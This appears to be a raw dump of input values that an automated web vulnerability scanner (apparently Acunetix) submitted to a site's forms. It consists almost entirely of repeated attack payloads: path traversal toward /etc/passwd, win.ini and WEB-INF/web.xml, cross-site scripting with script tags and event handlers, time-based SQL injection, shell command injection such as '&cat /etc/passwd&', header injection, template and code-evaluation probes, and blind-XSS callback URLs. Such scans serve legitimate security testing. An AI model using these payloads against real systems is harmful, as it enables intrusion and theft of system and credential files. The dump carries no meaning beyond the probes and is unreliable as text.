../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?948489></ScRiPt>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(945588)</ScRiPt>

1

1

1

................windowswin.ini

1<video><source onerror="javascript:prompt(944745)">

1

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(933610)"></g></svg>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<div style=width:expression(prompt(902226))>

1

response.write(9138526*9744159)

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<iframe src='data:text/html

'+response.write(9138526*9744159)+'

&cat /etc/passwd&

1

1

'&cat /etc/passwd&'

1

"+response.write(9138526*9744159)+"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<body onload=prompt(919864)>

1

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(944821)>

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

../../../../../../../../../../etc/passwd

cat /etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<img src=xyz OnErRor=prompt(930398)>

WEB-INF/web.xml

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

`cat /etc/passwd`

1

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF\web.xml

1<img/src=">" onerror=alert(979659)>

1

1

-1

../../../../../../../../../../etc/passwd.jpg

1

${99205+100106}

|cat /etc/passwd#

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1)

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1<ScRiPt%20>prompt(995286)</sCripT>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

'|'ld

1

1

1&n901220=v927909

1

1

1&lt

1some_inexistent_file_with_long_name%00.jpg

-1))

/../..//../..//../..//../..//../..//etc/passwd.jpg

"|"ld

1

1

1

)

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

tjlnZlkn'

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

\xf6<img acu onmouseover=prompt(987766) //\xf6>

1

!(()&&!|*|*|

1

/etc/passwd

LDkL10Ga')

'

'"()

1<input autofocus onfocus=prompt(985323)>

testasp.vulnweb.com

http://testasp.vulnweb.com/t/xss.html?%00.jpg

^(#$!@#$)(()))******

jVuDn1zM'))

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'

1

"

1

1

1

1

<a href='http://www.acunetix.com'>website security</a>

-1

1

||cat /etc/passwd

1

"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

-1)

[url=http://www.acunetix.com]website security[/url]

1

1

&dir

http://hitT8owEjDZvo.bxss.me/

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}

1

-1))

'&dir&'

1

1

1_yKWk6 <ScRiPt >prompt(963635)</ScRiPt>

ANhnHsLK'

1

${@print(md5(acunetix_wvs_security_test))}\

comments

1

"&dir&"

1

file:///etc/passwd

1

1

r7TvNxzg')

1

/\../\../\../\../\../\../\../etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

|dir

comments

1

1

DJX1rOfS'))

http://www.acunetix.tst

1

1

WEB-INF/web.xml

1

1

comments/.

'|dir

'"

1

1

WEB-INF\web.xml

1

1'"()&%<ScRiPt >prompt(989532)</ScRiPt>

1

1

<!--

"|dir

1

1

1

'"()&%<ScRiPt >prompt(932482)</ScRiPt>

1

../../../../../../../../../../windows/win.ini

1

1

1

1

1

1

1

1_996067

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

acu9705\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9705

1

................windowswin.ini

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

acux7227\xc0\xbez1\xc0\xbcz2a\x90bcxuca7227

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<ScRiPt >prompt(961570)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<script>prompt(900651)</script>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<ScRiPt >prompt(906490)</ScRiPt>

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?954761></ScRiPt>

1

1

1

1<ScRiPt >prompt(976328)</ScRiPt>

WEB-INF/web.xml

1

WEB-INF\web.xml

response.write(9570251*9012971)

1<video><source onerror="javascript:prompt(962564)">

1

1

1

1

'+response.write(9570251*9012971)+'

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(922301)"></g></svg>

SomeCustomInjectedHeader:injected_by_wvs

1

&cat /etc/passwd&

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9570251*9012971)+"

1

1

1<div style=width:expression(prompt(956932))>

'&cat /etc/passwd&'

1

1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1<iframe src='data:text/html

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd.jpg

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1

1

cat /etc/passwd

1<body onload=prompt(990617)>

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(913664)>

`cat /etc/passwd`

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

-1

1

|cat /etc/passwd#

1<img src=xyz OnErRor=prompt(999912)>

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1)

${100366+100097}

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

1

1

'|'ld

1<img/src=">" onerror=alert(935922)>

1some_inexistent_file_with_long_name%00.jpg

1

-1))

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1

yXO009q4'

"|"ld

1&n967531=v958859

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<ScRiPt%20>prompt(962739)</sCripT>

1

/etc/passwd

)

53M0E5B0')

'

1

testasp.vulnweb.com

1&lt

1

"

bR1SpApF'))

!(()&&!|*|*|

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'"()

1

'

1

\xf6<img acu onmouseover=prompt(979326) //\xf6>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

${@print(md5(acunetix_wvs_security_test))}

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

-1

^(#$!@#$)(()))******

1

1

${@print(md5(acunetix_wvs_security_test))}\

1

1<input autofocus onfocus=prompt(920558)>

"

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

1

-1)

1

||cat /etc/passwd

http://hitSBdm4N7amT.bxss.me/

<a href='http://www.acunetix.com'>website security</a>

1

1

1

-1))

1

&dir

file:///etc/passwd

acunetix_wvs_invalid_filename

1

[url=http://www.acunetix.com]website security[/url]

n3MdhYfu'

/\../\../\../\../\../\../\../etc/passwd

'&dir&'

1

1

1

1

comments

1_OLZqF <ScRiPt >prompt(906745)</ScRiPt>

KEKA4ePD')

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

WEB-INF/web.xml

1

1

comments

1

"&dir&"

1

WEB-INF\web.xml

idsLUmzg'))

'"

1

http://www.acunetix.tst

1

1

comments/.

1

1'"()&%<ScRiPt >prompt(900495)</ScRiPt>

|dir

../../../../../../../../../../windows/win.ini

1

1

<!--

1

1

1

../../../../../../../../../../boot.ini

'|dir

'"()&%<ScRiPt >prompt(973605)</ScRiPt>

1

1

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1_929664

"|dir

1

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

acu8815\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8815

1

1

1

acux6937\xc0\xbez1\xc0\xbcz2a\x90bcxuca6937

1

................windowswin.ini

1

1

1

1<ScRiPt >prompt(903783)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<script>prompt(978545)</script>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<ScRiPt >prompt(960255)</ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?951865></ScRiPt>

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<ScRiPt >prompt(958144)</ScRiPt>

1

1

1<video><source onerror="javascript:prompt(915402)">

1

1

WEB-INF/web.xml

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(939248)"></g></svg>

response.write(9408144*9636156)

&cat /etc/passwd&

1

1

'+response.write(9408144*9636156)+'

1<div style=width:expression(prompt(939269))>

WEB-INF\web.xml

1

'&cat /etc/passwd&'

1

"+response.write(9408144*9636156)+"

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

../../../../../../../../../../etc/passwd

1<iframe src='data:text/html

"&cat /etc/passwd&"

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

cat /etc/passwd

1<body onload=prompt(946039)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

${99204+99176}

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

../../../../../../../../../../etc/passwd.jpg

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(948279)>

`cat /etc/passwd`

1

1

-1

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<img src=xyz OnErRor=prompt(964625)>

1

1&n915502=v927260

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

|cat /etc/passwd#

-1)

1

1

1

1<img/src=">" onerror=alert(962272)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

'|'ld

-1))

1some_inexistent_file_with_long_name%00.jpg

1

)

yfvu0LPp'

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<ScRiPt%20>prompt(945218)</sCripT>

1

"|"ld

1

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'"()

xOyYiQDD')

'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1&lt

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

^(#$!@#$)(()))******

"

iPVP8Roa'))

1

testasp.vulnweb.com

1

/etc/passwd

1

\xf6<img acu onmouseover=prompt(979630) //\xf6>

1

'

${@print(md5(acunetix_wvs_security_test))}

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

-1

1

1

"

${@print(md5(acunetix_wvs_security_test))}\

1

1<input autofocus onfocus=prompt(921736)>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

-1)

1

http://hitnK9RBqL3Oe.bxss.me/

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

<a href='http://www.acunetix.com'>website security</a>

acunetix_wvs_invalid_filename

1

1

||cat /etc/passwd

1

1

-1))

1

1

comments

[url=http://www.acunetix.com]website security[/url]

1

1

2qk3u9x5'

1

1

&dir

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

1_s68at <ScRiPt >prompt(923818)</ScRiPt>

file:///etc/passwd

01xps6nh')

1

'&dir&'

1

comments/.

'"

1

1

1

/\../\../\../\../\../\../\../etc/passwd

QN5TBaA2'))

1

"&dir&"

1

<!--

1

1'"()&%<ScRiPt >prompt(925533)</ScRiPt>

1

1

|dir

1

WEB-INF/web.xml

1

'"()&%<ScRiPt >prompt(927895)</ScRiPt>

1

1

1

WEB-INF\web.xml

'|dir

1_948055

1

1

../../../../../../../../../../windows/win.ini

1

1

1

"|dir

../../../../../../../../../../boot.ini

acu2189\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2189

1

1

../../../../../../../../../../windows/win.ini.jpg

1

acux9437\xc0\xbez1\xc0\xbcz2a\x90bcxuca9437

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt >prompt(999906)</ScRiPt>

1

1

................windowswin.ini

1<script>prompt(917458)</script>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(991933)</ScRiPt>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?911814></ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<ScRiPt >prompt(939481)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

1

response.write(9600928*9175136)

1<video><source onerror="javascript:prompt(929908)">

1

1

1

'+response.write(9600928*9175136)+'

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(931215)"></g></svg>

1

WEB-INF/web.xml

1

1

&cat /etc/passwd&

"+response.write(9600928*9175136)+"

1<div style=width:expression(prompt(957650))>

WEB-INF\web.xml

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

1

'&cat /etc/passwd&'

1<iframe src='data:text/html

1

${99604+99699}

1

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1

1

1

1<body onload=prompt(995909)>

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

../../../../../../../../../../etc/passwd.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

cat /etc/passwd

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(933871)>

1

1

1&n990063=v975950

-1

`cat /etc/passwd`

1some_inexistent_file_with_long_name%00.jpg

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1<img src=xyz OnErRor=prompt(968799)>

1

1

-1)

)

|cat /etc/passwd#

1<img/src=">" onerror=alert(992040)>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'|'ld

!(()&&!|*|*|

-1))

1

1<ScRiPt%20>prompt(999882)</sCripT>

1

testasp.vulnweb.com

'"()

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

rfDUiGZU'

1&lt

^(#$!@#$)(()))******

"|"ld

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

nagpUG8N')

1

1

1

\xf6<img acu onmouseover=prompt(991288) //\xf6>

6AwEDTRO'))

1

/etc/passwd

1

'

'

1<input autofocus onfocus=prompt(939347)>

1

1

1

-1

"

"

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

1

1

<a href='http://www.acunetix.com'>website security</a>

-1)

||cat /etc/passwd

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

${@print(md5(acunetix_wvs_security_test))}\

http://hitvpIhDwGv7Z.bxss.me/

-1))

[url=http://www.acunetix.com]website security[/url]

1

acunetix_wvs_invalid_filename

&dir

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

HIeM4Wrj'

'&dir&'

comments

1

1_j8o9Q <ScRiPt >prompt(974624)</ScRiPt>

1

1

jXsL6svv')

1

1

"&dir&"

comments

http://www.acunetix.tst

'"

1

Y4LJN9rL'))

1

file:///etc/passwd

1

|dir

comments/.

1

<!--

1

1

1

1'"()&%<ScRiPt >prompt(974795)</ScRiPt>

'|dir

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

"|dir

1

'"()&%<ScRiPt >prompt(901709)</ScRiPt>

1

1

WEB-INF/web.xml

1

1

1

1_920707

1

WEB-INF\web.xml

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

1

../../../../../../../../../../boot.ini

acu4041\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4041

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

acux4014\xc0\xbez1\xc0\xbcz2a\x90bcxuca4014

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

................windowswin.ini

1<ScRiPt >prompt(960569)</ScRiPt>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<script>prompt(902827)</script>

1

1

1<ScRiPt >prompt(935002)</ScRiPt>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?977955></ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt >prompt(947847)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<video><source onerror="javascript:prompt(934293)">

1

1

1

response.write(9586683*9013586)

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(954960)"></g></svg>

&cat /etc/passwd&

WEB-INF/web.xml

1

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

1<div style=width:expression(prompt(908780))>

1

'+response.write(9586683*9013586)+'

SomeCustomInjectedHeader:injected_by_wvs

1

WEB-INF\web.xml

"&cat /etc/passwd&"

1

"+response.write(9586683*9013586)+"

../../../../../../../../../../etc/passwd

1<iframe src='data:text/html

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

cat /etc/passwd

1

1

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1<body onload=prompt(958554)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1

`cat /etc/passwd`

../../../../../../../../../../etc/passwd.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(991206)>

1

-1

1

1

1

1

${99270+100482}

|cat /etc/passwd#

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<img src=xyz OnErRor=prompt(989352)>

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1)

1

1

1&n919527=v983261

1<img/src=">" onerror=alert(940291)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

'|'ld

1

1

1some_inexistent_file_with_long_name%00.jpg

-1))

)

1<ScRiPt%20>prompt(900896)</sCripT>

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

!(()&&!|*|*|

DO2PU90u'

"|"ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

testasp.vulnweb.com

1

1&lt

http://testasp.vulnweb.com/t/xss.html?%00.jpg

^(#$!@#$)(()))******

1

'"()

gNRWUrhr')

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

'

1

\xf6<img acu onmouseover=prompt(910794) //\xf6>

1

/etc/passwd

7r3jOAO6'))

1

'

1

"

1<input autofocus onfocus=prompt(932651)>

1

1

1

-1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

"

1

1

<a href='http://www.acunetix.com'>website security</a>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1)

acunetix_wvs_invalid_filename

1

http://hitySskHqp0WU.bxss.me/

${@print(md5(acunetix_wvs_security_test))}\

[url=http://www.acunetix.com]website security[/url]

||cat /etc/passwd

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

comments

-1))

1

1

1_aZyDe <ScRiPt >prompt(944811)</ScRiPt>

1

&dir

1

comments

7ZUaFRoE'

1

1

'&dir&'

http://www.acunetix.tst

'"

1

file:///etc/passwd

2FtoljlB')

comments/.

1

1

/\../\../\../\../\../\../\../etc/passwd

<!--

"&dir&"

1'"()&%<ScRiPt >prompt(935769)</ScRiPt>

1

1

1

1

hMWGyANp'))

1

WEB-INF/web.xml

'"()&%<ScRiPt >prompt(982805)</ScRiPt>

|dir

1

1

1

1

1_997237

WEB-INF\web.xml

1

1

1

1

'|dir

../../../../../../../../../../windows/win.ini

1

1

"|dir

../../../../../../../../../../boot.ini

1

1

acu8390\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8390

1

../../../../../../../../../../windows/win.ini.jpg

1

1

acux8091\xc0\xbez1\xc0\xbcz2a\x90bcxuca8091

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(951532)</ScRiPt>

1

1

1<script>prompt(998238)</script>

................windowswin.ini

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(980960)</ScRiPt>

1

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?932620></ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<ScRiPt >prompt(903538)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<video><source onerror="javascript:prompt(900581)">

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(997616)"></g></svg>

1

1

1<div style=width:expression(prompt(912092))>

1

response.write(9515847*9448306)

1

1

'+response.write(9515847*9448306)+'

1<iframe src='data:text/html

1

&cat /etc/passwd&

1

1

WEB-INF/web.xml

"+response.write(9515847*9448306)+"

1<body onload=prompt(994151)>

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

WEB-INF\web.xml

1

1

1

'&cat /etc/passwd&'

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(955879)>

1

1

1

1

"&cat /etc/passwd&"

1

../../../../../../../../../../etc/passwd.jpg

SomeCustomInjectedHeader:injected_by_wvs

1<img src=xyz OnErRor=prompt(980655)>

1

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

${100473+100480}

1

cat /etc/passwd

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<img/src=">" onerror=alert(910631)>

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1&n974849=v990668

`cat /etc/passwd`

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1some_inexistent_file_with_long_name%00.jpg

1

1<ScRiPt%20>prompt(979200)</sCripT>

)

1

-1

|cat /etc/passwd#

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1&lt

1

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'|'ld

1

-1)

\xf6<img acu onmouseover=prompt(937206) //\xf6>

'"()

testasp.vulnweb.com

^(#$!@#$)(()))******

/etc/passwd

1

-1))

1

"|"ld

1<input autofocus onfocus=prompt(991455)>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'

1

1

BjfMHAK1'

<a href='http://www.acunetix.com'>website security</a>

1

1

1

1

4O7hwtbH')

1

"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

[url=http://www.acunetix.com]website security[/url]

'

1

1

${@print(md5(acunetix_wvs_security_test))}

1

ceIrAYah'))

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1_yk5r5 <ScRiPt >prompt(938839)</ScRiPt>

1

1

"

-1

${@print(md5(acunetix_wvs_security_test))}\

http://hitA6WrH3BZkh.bxss.me/

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

||cat /etc/passwd

acunetix_wvs_invalid_filename

1

-1)

1

1

file:///etc/passwd

1

1

1

-1))

comments

&dir

1

http://www.acunetix.tst

/\../\../\../\../\../\../\../etc/passwd

1'"()&%<ScRiPt >prompt(924300)</ScRiPt>

1

'"

x59JilCB'

1

'&dir&'

1

comments

WEB-INF/web.xml

MjxsAAGr')

<!--

1

'"()&%<ScRiPt >prompt(987011)</ScRiPt>

1

1

comments/.

"&dir&"

lbt4IW7F'))

WEB-INF\web.xml

1

1

1

1

1_959168

1

|dir

../../../../../../../../../../windows/win.ini

1

1

1

1

1

1

../../../../../../../../../../boot.ini

'|dir

